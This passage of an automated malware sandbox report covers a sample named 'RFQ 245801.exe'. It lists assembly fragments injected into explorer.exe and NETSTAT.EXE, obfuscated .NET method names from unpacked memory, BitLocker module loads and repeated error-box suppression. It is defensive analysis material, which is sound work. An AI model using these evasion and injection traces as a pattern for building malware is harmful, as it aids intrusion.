Source: C:\Windows\explorer.exe Code function: 6_2_0F6FAB02 push esp; retn 0000h 6_2_0F6FAB03
Source: C:\Windows\explorer.exe Code function: 6_2_0F6FAB1E push esp; retn 0000h 6_2_0F6FAB1F
Source: C:\Windows\explorer.exe Code function: 6_2_0F6FA9B5 push esp; retn 0000h 6_2_0F6FAAE7
Source: C:\Windows\explorer.exe Code function: 6_2_0FBAB9B5 push esp; retn 0000h 6_2_0FBABAE7
Source: C:\Windows\explorer.exe Code function: 6_2_0FBABB1E push esp; retn 0000h 6_2_0FBABB1F
Source: C:\Windows\explorer.exe Code function: 6_2_0FBABB02 push esp; retn 0000h 6_2_0FBABB03
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_006460DD push ecx; ret 7_2_006460F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030D09AD push ecx; mov dword ptr [esp], ecx 7_2_030D09B6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026B7132 push ecx; iretd 7_2_026B7133
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026B7116 push ss; iretd 7_2_026B7118
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026AA47D pushad ; ret 7_2_026AA47E
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026BD4DB push eax; ret 7_2_026BD542
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026BD4D2 push eax; ret 7_2_026BD4D8
Source: RFQ 245801.exe Static PE information: section name: .text entropy: 7.932697234212169
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, WgiBpPxEFw5XWqUhVJ.cs High entropy of concatenated method names: 'GJM72b4XM', 'l6NiWwtcL', 'nyTBSVdyE', 'eMWayyWGd', 'm3wulBWkE', 'yymV0AiBK', 'uYcjcMSOUp132N6jS3', 'u7MtpBK49eG4oyE57U', 'QEdX8W5lj', 'I26SKvybS'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, fJLFWsoNNh2D9wwqVh.cs High entropy of concatenated method names: 'NIvMFtZOeP', 'FxXMJwU146', 'gAlM7RpRc8', 'PPoMiFRBjO', 'PGJM2sVfWo', 'B8PMBwZDAt', 'UGSMaV5HJi', 'ssCMbsnkWY', 'dUrMux6nZu', 'Yj8MV7rBGX'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, Pp6KbidXG6NYFVhHii.cs High entropy of concatenated method names: 'GDQfl9x7FM', 'Lkrfgj1lW6', 'alRXo0ep98', 'HnVXkYJLBT', 'M1hfelj4C3', 'r9NfRsOyFL', 'CADfQnDchs', 'gXFfmp6CTe', 'sgtfIWv1Cc', 'JW5fc9WNmx'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, ykvgwsy2sp0Dxo7e19.cs High entropy of concatenated method names: 'h0mpmK4BW4', 'L29pIYQFC2', 'T3ypcR7c1J', 'WtjpPEZdrd', 'jBxpTpIhqp', 'BgmpYIncW2', 'lakpWf8DED', 'xvhpl6RqgY', 'Mh0psWVFxE', 'MxEpgugcFR'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, aSTAvhByNgibKQ2Fu5.cs High entropy of concatenated method names: 'ensjiojMtT', 'OCbjB32da8', 'Hq0jb23GJk', 'ot0juUJsuF', 'C40jK2yF1B', 'P5jjn6AD0b', 'z7ejfu7Pq7', 'pgljXSLuZo', 'Xv7jA7spA0', 'VDZjSv2e3Q'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, evvAxakZCXhQan771b.cs High entropy of concatenated method names: 'aIk54VadLJ', 'Nbf5FjKw2t', 'RfX57YrIuA', 'mpp5i3MNfy', 'lno5BT7OIy', 't4n5acvJ2d', 'g7R5ua68Be', 'AlQ5VPS99b', 'kDtBkR8uAVrZKHOY2Id', 'GpEC038ZD19lmOGhD9y'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, GwxhdMvE70alVQgO2H.cs High entropy of concatenated method names: 'puuD1Nwm8k', 'WpHD8aBqTC', 'hyBDpnN38A', 'SbZDjD26aV', 'tM9DGV4vix', 'UfxD5ZDZlq', 'AmdDMBwBBs', 'GcVDx6k9Zj', 'QqeDNcu62U', 'autDEPkuYU'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, wIPVxezBCi6yaK1kDK.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LcIAqNUlOE', 'zBxAKH4HpO', 'gsvAnKF9Mn', 'CO1Afyw5KG', 'Xj3AXDoIV6', 'E6jAArOjW2', 'AbSASMQIUG'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, Vj1PsPUkKgHXmyWVAr.cs High entropy of concatenated method names: 'BawXwvSkbc', 'ih9X0FXu8r', 'MYOX3LV9cK', 'Hv0XLo72cx', 'qW1Xm4gn28', 'PohXtX2TN7', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, cR2wkeeEmUg7K1hb5P.cs High entropy of concatenated method names: 'FCMKv4lKoN', 'MNgKR96FkT', 'NbgKmpTRG2', 'q9aKIMJtVF', 'leFK0i1gBY', 'l1eK3DrWLC', 'IPbKLXXxrK', 'NUiKtLrNHM', 'tg7K6U86V8', 'rjNKrg6AQb'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, JX4i456yo2MKdam2oZ.cs High entropy of concatenated method names: 'OUp51orFpZ', 'p2y5pnUJm3', 'Utf5G8m17e', 'CMY5MFhInp', 'y7A5xQCsAS', 'YbZGTExH0a', 'zy6GYJvG5T', 'yGQGWEC9Es', 'xVVGl35cyR', 'wt8GsOoNO7'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, QocsAcjbV9qKLZWBRE.cs High entropy of concatenated method names: 'Dispose', 'dBYksuBA4K', 'QJ990SyyKW', 'h0xyywG70G', 'co5kgiMbkc', 'N9pkz0G8J7', 'ProcessDialogKey', 'aAF9oriXPN', 'NLY9kKdbmC', 'pKE9930rop'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, R6B0AfnmHiIFCScC9n.cs High entropy of concatenated method names: 'qpyqb2KokD', 'D9cquH8ibZ', 'JM0qwlYFq0', 'N81q0BAd8g', 'NSQqLPa1LM', 'gOQqtoT16X', 'vkBqrQGOE7', 'i73qhl9v7d', 'z0jqvYH8EV', 'vfLqeQ9Ju4'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, gj4fiq0cbqS67yHNi8.cs High entropy of concatenated method names: 'FFJX8bUwFZ', 'KjWXpTNfWP', 'Pe1XjOjOmA', 'ynMXGulk6v', 'W7VX5hcGlQ', 'SmIXMp79sm', 'TSIXxoeoNp', 'ySuXN4Iv1E', 'QKDXE1uiIC', 'ySyXdfqKBw'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, BtID8LccH7jVfw8BjuT.cs High entropy of concatenated method names: 'ToString', 'kakSDgaZVr', 'CepSHrSoui', 'JJRS1Olgiu', 'fhYS85fMWI', 'J2jSpIvDP4', 'MQaSjTY9Qu', 'pw6SGks02G', 'xQOLxWFKfC6n3r966wl', 'xjBLoAFjco7dYnTLoEh'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, AWHXGwJvdG0koSWdHq.cs High entropy of concatenated method names: 'hLbAkYSVsD', 'ECLADBxr0X', 'jOoAH9fKyk', 'FHyA8HHOCJ', 'dLUApwRvFv', 't5WAGyaeSw', 'SmQA5jZAr9', 'l1LXWxhQnD', 'bQJXlnAfcN', 'NV8Xs3JRTB'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, jou9lSc2pb66G6VFaAF.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IgESmlorLN', 'huqSIAl9rd', 'rGrScfC6bb', 'jbXSP1v4BH', 'dUfSTlXA53', 'DIjSYW6ZPj', 'zyiSWIcUeQ'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, EOWlqHciZCVwJpnRUia.cs High entropy of concatenated method names: 'lCeAFxrg5Q', 'yq9AJfgBpr', 'gxpA7cv29g', 'OgaAi8lo5U', 'xcCA2ExvA3', 'qSeABp98hR', 'LZwAaKqk5A', 'FaEAbbqqob', 'oIuAukOBQo', 'OCrAV6PB7S'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, eXGkH9PtNjZJJbc2dM.cs High entropy of concatenated method names: 'Em6kMFoAPf', 'D61kxAfQRw', 'sPTkEmcsg9', 'i8Mkdnesh8', 'tvdkKTUhoV', 'OuOknGTlgA', 'LLnhmds5VmAinjOmDO', 'SWnWoMU5KNBUdliNpB', 'fYokkOfZnt', 'ej8kDCydEd'
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, Y5N6j8ZlrgTP7fUCew.cs High entropy of concatenated method names: 'E7LM8IywVu', 'DteMj1sF8F', 'esDM5AUOi5', 'U7e5gYkNob', 'Jxk5zBx8p2', 'FHnMowkt8I', 'WjCMkL3STR', 'HSGM9kdSGy', 'nYEMDVt4r5', 'b8MMHS0PFs'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, WgiBpPxEFw5XWqUhVJ.cs High entropy of concatenated method names: 'GJM72b4XM', 'l6NiWwtcL', 'nyTBSVdyE', 'eMWayyWGd', 'm3wulBWkE', 'yymV0AiBK', 'uYcjcMSOUp132N6jS3', 'u7MtpBK49eG4oyE57U', 'QEdX8W5lj', 'I26SKvybS'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, fJLFWsoNNh2D9wwqVh.cs High entropy of concatenated method names: 'NIvMFtZOeP', 'FxXMJwU146', 'gAlM7RpRc8', 'PPoMiFRBjO', 'PGJM2sVfWo', 'B8PMBwZDAt', 'UGSMaV5HJi', 'ssCMbsnkWY', 'dUrMux6nZu', 'Yj8MV7rBGX'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, Pp6KbidXG6NYFVhHii.cs High entropy of concatenated method names: 'GDQfl9x7FM', 'Lkrfgj1lW6', 'alRXo0ep98', 'HnVXkYJLBT', 'M1hfelj4C3', 'r9NfRsOyFL', 'CADfQnDchs', 'gXFfmp6CTe', 'sgtfIWv1Cc', 'JW5fc9WNmx'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, ykvgwsy2sp0Dxo7e19.cs High entropy of concatenated method names: 'h0mpmK4BW4', 'L29pIYQFC2', 'T3ypcR7c1J', 'WtjpPEZdrd', 'jBxpTpIhqp', 'BgmpYIncW2', 'lakpWf8DED', 'xvhpl6RqgY', 'Mh0psWVFxE', 'MxEpgugcFR'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, aSTAvhByNgibKQ2Fu5.cs High entropy of concatenated method names: 'ensjiojMtT', 'OCbjB32da8', 'Hq0jb23GJk', 'ot0juUJsuF', 'C40jK2yF1B', 'P5jjn6AD0b', 'z7ejfu7Pq7', 'pgljXSLuZo', 'Xv7jA7spA0', 'VDZjSv2e3Q'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, evvAxakZCXhQan771b.cs High entropy of concatenated method names: 'aIk54VadLJ', 'Nbf5FjKw2t', 'RfX57YrIuA', 'mpp5i3MNfy', 'lno5BT7OIy', 't4n5acvJ2d', 'g7R5ua68Be', 'AlQ5VPS99b', 'kDtBkR8uAVrZKHOY2Id', 'GpEC038ZD19lmOGhD9y'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, GwxhdMvE70alVQgO2H.cs High entropy of concatenated method names: 'puuD1Nwm8k', 'WpHD8aBqTC', 'hyBDpnN38A', 'SbZDjD26aV', 'tM9DGV4vix', 'UfxD5ZDZlq', 'AmdDMBwBBs', 'GcVDx6k9Zj', 'QqeDNcu62U', 'autDEPkuYU'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, wIPVxezBCi6yaK1kDK.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LcIAqNUlOE', 'zBxAKH4HpO', 'gsvAnKF9Mn', 'CO1Afyw5KG', 'Xj3AXDoIV6', 'E6jAArOjW2', 'AbSASMQIUG'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, Vj1PsPUkKgHXmyWVAr.cs High entropy of concatenated method names: 'BawXwvSkbc', 'ih9X0FXu8r', 'MYOX3LV9cK', 'Hv0XLo72cx', 'qW1Xm4gn28', 'PohXtX2TN7', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, cR2wkeeEmUg7K1hb5P.cs High entropy of concatenated method names: 'FCMKv4lKoN', 'MNgKR96FkT', 'NbgKmpTRG2', 'q9aKIMJtVF', 'leFK0i1gBY', 'l1eK3DrWLC', 'IPbKLXXxrK', 'NUiKtLrNHM', 'tg7K6U86V8', 'rjNKrg6AQb'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, JX4i456yo2MKdam2oZ.cs High entropy of concatenated method names: 'OUp51orFpZ', 'p2y5pnUJm3', 'Utf5G8m17e', 'CMY5MFhInp', 'y7A5xQCsAS', 'YbZGTExH0a', 'zy6GYJvG5T', 'yGQGWEC9Es', 'xVVGl35cyR', 'wt8GsOoNO7'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, QocsAcjbV9qKLZWBRE.cs High entropy of concatenated method names: 'Dispose', 'dBYksuBA4K', 'QJ990SyyKW', 'h0xyywG70G', 'co5kgiMbkc', 'N9pkz0G8J7', 'ProcessDialogKey', 'aAF9oriXPN', 'NLY9kKdbmC', 'pKE9930rop'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, R6B0AfnmHiIFCScC9n.cs High entropy of concatenated method names: 'qpyqb2KokD', 'D9cquH8ibZ', 'JM0qwlYFq0', 'N81q0BAd8g', 'NSQqLPa1LM', 'gOQqtoT16X', 'vkBqrQGOE7', 'i73qhl9v7d', 'z0jqvYH8EV', 'vfLqeQ9Ju4'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, gj4fiq0cbqS67yHNi8.cs High entropy of concatenated method names: 'FFJX8bUwFZ', 'KjWXpTNfWP', 'Pe1XjOjOmA', 'ynMXGulk6v', 'W7VX5hcGlQ', 'SmIXMp79sm', 'TSIXxoeoNp', 'ySuXN4Iv1E', 'QKDXE1uiIC', 'ySyXdfqKBw'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, BtID8LccH7jVfw8BjuT.cs High entropy of concatenated method names: 'ToString', 'kakSDgaZVr', 'CepSHrSoui', 'JJRS1Olgiu', 'fhYS85fMWI', 'J2jSpIvDP4', 'MQaSjTY9Qu', 'pw6SGks02G', 'xQOLxWFKfC6n3r966wl', 'xjBLoAFjco7dYnTLoEh'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, AWHXGwJvdG0koSWdHq.cs High entropy of concatenated method names: 'hLbAkYSVsD', 'ECLADBxr0X', 'jOoAH9fKyk', 'FHyA8HHOCJ', 'dLUApwRvFv', 't5WAGyaeSw', 'SmQA5jZAr9', 'l1LXWxhQnD', 'bQJXlnAfcN', 'NV8Xs3JRTB'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, jou9lSc2pb66G6VFaAF.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IgESmlorLN', 'huqSIAl9rd', 'rGrScfC6bb', 'jbXSP1v4BH', 'dUfSTlXA53', 'DIjSYW6ZPj', 'zyiSWIcUeQ'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, EOWlqHciZCVwJpnRUia.cs High entropy of concatenated method names: 'lCeAFxrg5Q', 'yq9AJfgBpr', 'gxpA7cv29g', 'OgaAi8lo5U', 'xcCA2ExvA3', 'qSeABp98hR', 'LZwAaKqk5A', 'FaEAbbqqob', 'oIuAukOBQo', 'OCrAV6PB7S'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, eXGkH9PtNjZJJbc2dM.cs High entropy of concatenated method names: 'Em6kMFoAPf', 'D61kxAfQRw', 'sPTkEmcsg9', 'i8Mkdnesh8', 'tvdkKTUhoV', 'OuOknGTlgA', 'LLnhmds5VmAinjOmDO', 'SWnWoMU5KNBUdliNpB', 'fYokkOfZnt', 'ej8kDCydEd'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, Y5N6j8ZlrgTP7fUCew.cs High entropy of concatenated method names: 'E7LM8IywVu', 'DteMj1sF8F', 'esDM5AUOi5', 'U7e5gYkNob', 'Jxk5zBx8p2', 'FHnMowkt8I', 'WjCMkL3STR', 'HSGM9kdSGy', 'nYEMDVt4r5', 'b8MMHS0PFs'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, WgiBpPxEFw5XWqUhVJ.cs High entropy of concatenated method names: 'GJM72b4XM', 'l6NiWwtcL', 'nyTBSVdyE', 'eMWayyWGd', 'm3wulBWkE', 'yymV0AiBK', 'uYcjcMSOUp132N6jS3', 'u7MtpBK49eG4oyE57U', 'QEdX8W5lj', 'I26SKvybS'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, fJLFWsoNNh2D9wwqVh.cs High entropy of concatenated method names: 'NIvMFtZOeP', 'FxXMJwU146', 'gAlM7RpRc8', 'PPoMiFRBjO', 'PGJM2sVfWo', 'B8PMBwZDAt', 'UGSMaV5HJi', 'ssCMbsnkWY', 'dUrMux6nZu', 'Yj8MV7rBGX'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, Pp6KbidXG6NYFVhHii.cs High entropy of concatenated method names: 'GDQfl9x7FM', 'Lkrfgj1lW6', 'alRXo0ep98', 'HnVXkYJLBT', 'M1hfelj4C3', 'r9NfRsOyFL', 'CADfQnDchs', 'gXFfmp6CTe', 'sgtfIWv1Cc', 'JW5fc9WNmx'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, ykvgwsy2sp0Dxo7e19.cs High entropy of concatenated method names: 'h0mpmK4BW4', 'L29pIYQFC2', 'T3ypcR7c1J', 'WtjpPEZdrd', 'jBxpTpIhqp', 'BgmpYIncW2', 'lakpWf8DED', 'xvhpl6RqgY', 'Mh0psWVFxE', 'MxEpgugcFR'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, aSTAvhByNgibKQ2Fu5.cs High entropy of concatenated method names: 'ensjiojMtT', 'OCbjB32da8', 'Hq0jb23GJk', 'ot0juUJsuF', 'C40jK2yF1B', 'P5jjn6AD0b', 'z7ejfu7Pq7', 'pgljXSLuZo', 'Xv7jA7spA0', 'VDZjSv2e3Q'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, evvAxakZCXhQan771b.cs High entropy of concatenated method names: 'aIk54VadLJ', 'Nbf5FjKw2t', 'RfX57YrIuA', 'mpp5i3MNfy', 'lno5BT7OIy', 't4n5acvJ2d', 'g7R5ua68Be', 'AlQ5VPS99b', 'kDtBkR8uAVrZKHOY2Id', 'GpEC038ZD19lmOGhD9y'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, GwxhdMvE70alVQgO2H.cs High entropy of concatenated method names: 'puuD1Nwm8k', 'WpHD8aBqTC', 'hyBDpnN38A', 'SbZDjD26aV', 'tM9DGV4vix', 'UfxD5ZDZlq', 'AmdDMBwBBs', 'GcVDx6k9Zj', 'QqeDNcu62U', 'autDEPkuYU'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, wIPVxezBCi6yaK1kDK.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LcIAqNUlOE', 'zBxAKH4HpO', 'gsvAnKF9Mn', 'CO1Afyw5KG', 'Xj3AXDoIV6', 'E6jAArOjW2', 'AbSASMQIUG'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, Vj1PsPUkKgHXmyWVAr.cs High entropy of concatenated method names: 'BawXwvSkbc', 'ih9X0FXu8r', 'MYOX3LV9cK', 'Hv0XLo72cx', 'qW1Xm4gn28', 'PohXtX2TN7', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, cR2wkeeEmUg7K1hb5P.cs High entropy of concatenated method names: 'FCMKv4lKoN', 'MNgKR96FkT', 'NbgKmpTRG2', 'q9aKIMJtVF', 'leFK0i1gBY', 'l1eK3DrWLC', 'IPbKLXXxrK', 'NUiKtLrNHM', 'tg7K6U86V8', 'rjNKrg6AQb'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, JX4i456yo2MKdam2oZ.cs High entropy of concatenated method names: 'OUp51orFpZ', 'p2y5pnUJm3', 'Utf5G8m17e', 'CMY5MFhInp', 'y7A5xQCsAS', 'YbZGTExH0a', 'zy6GYJvG5T', 'yGQGWEC9Es', 'xVVGl35cyR', 'wt8GsOoNO7'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, QocsAcjbV9qKLZWBRE.cs High entropy of concatenated method names: 'Dispose', 'dBYksuBA4K', 'QJ990SyyKW', 'h0xyywG70G', 'co5kgiMbkc', 'N9pkz0G8J7', 'ProcessDialogKey', 'aAF9oriXPN', 'NLY9kKdbmC', 'pKE9930rop'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, R6B0AfnmHiIFCScC9n.cs High entropy of concatenated method names: 'qpyqb2KokD', 'D9cquH8ibZ', 'JM0qwlYFq0', 'N81q0BAd8g', 'NSQqLPa1LM', 'gOQqtoT16X', 'vkBqrQGOE7', 'i73qhl9v7d', 'z0jqvYH8EV', 'vfLqeQ9Ju4'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, gj4fiq0cbqS67yHNi8.cs High entropy of concatenated method names: 'FFJX8bUwFZ', 'KjWXpTNfWP', 'Pe1XjOjOmA', 'ynMXGulk6v', 'W7VX5hcGlQ', 'SmIXMp79sm', 'TSIXxoeoNp', 'ySuXN4Iv1E', 'QKDXE1uiIC', 'ySyXdfqKBw'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, BtID8LccH7jVfw8BjuT.cs High entropy of concatenated method names: 'ToString', 'kakSDgaZVr', 'CepSHrSoui', 'JJRS1Olgiu', 'fhYS85fMWI', 'J2jSpIvDP4', 'MQaSjTY9Qu', 'pw6SGks02G', 'xQOLxWFKfC6n3r966wl', 'xjBLoAFjco7dYnTLoEh'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, AWHXGwJvdG0koSWdHq.cs High entropy of concatenated method names: 'hLbAkYSVsD', 'ECLADBxr0X', 'jOoAH9fKyk', 'FHyA8HHOCJ', 'dLUApwRvFv', 't5WAGyaeSw', 'SmQA5jZAr9', 'l1LXWxhQnD', 'bQJXlnAfcN', 'NV8Xs3JRTB'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, jou9lSc2pb66G6VFaAF.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IgESmlorLN', 'huqSIAl9rd', 'rGrScfC6bb', 'jbXSP1v4BH', 'dUfSTlXA53', 'DIjSYW6ZPj', 'zyiSWIcUeQ'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, EOWlqHciZCVwJpnRUia.cs High entropy of concatenated method names: 'lCeAFxrg5Q', 'yq9AJfgBpr', 'gxpA7cv29g', 'OgaAi8lo5U', 'xcCA2ExvA3', 'qSeABp98hR', 'LZwAaKqk5A', 'FaEAbbqqob', 'oIuAukOBQo', 'OCrAV6PB7S'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, eXGkH9PtNjZJJbc2dM.cs High entropy of concatenated method names: 'Em6kMFoAPf', 'D61kxAfQRw', 'sPTkEmcsg9', 'i8Mkdnesh8', 'tvdkKTUhoV', 'OuOknGTlgA', 'LLnhmds5VmAinjOmDO', 'SWnWoMU5KNBUdliNpB', 'fYokkOfZnt', 'ej8kDCydEd'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, Y5N6j8ZlrgTP7fUCew.cs High entropy of concatenated method names: 'E7LM8IywVu', 'DteMj1sF8F', 'esDM5AUOi5', 'U7e5gYkNob', 'Jxk5zBx8p2', 'FHnMowkt8I', 'WjCMkL3STR', 'HSGM9kdSGy', 'nYEMDVt4r5', 'b8MMHS0PFs'

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
